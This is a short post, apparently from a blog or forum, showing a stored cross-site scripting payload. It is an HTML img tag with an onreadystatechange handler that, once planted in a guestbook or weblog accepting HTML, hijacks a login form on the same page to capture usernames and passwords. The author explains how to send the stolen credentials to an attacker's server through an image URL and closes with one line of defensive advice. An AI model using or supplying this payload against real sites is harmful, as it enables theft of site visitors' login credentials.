Today, I will show code that allows you to get username and password from pages that have the login form on the same page as the guestbook. The following code can be added to a guestbook or a weblog if the accept html code, the do not have to allow <SCRIPT> tags:
<img src="/trans.gif " onreadystatechange="document.forms.onsubmit=new Function('alert(\'Website hacked: \'+document.forms.username.value+\'|\'+document.forms.password.value);');" width=1 height=1>
Now, if the page will be shown the onreadystatechange event will be fired (Note: the trans.gif must be available on this website, can be replaced by any other image!). We add a new function to the event handler submit. If you click on submit (will be login) a message box will appear showing your credentials. It is very easy to load a second image from your server with the credentials as additional arguments like http://yourserver.com/image.gif?username=xx&password=yy, so you have everything you want.
I have created this small script to show you how easy it still is to get user credentials.
To be secure put the login form to a seperate page!!!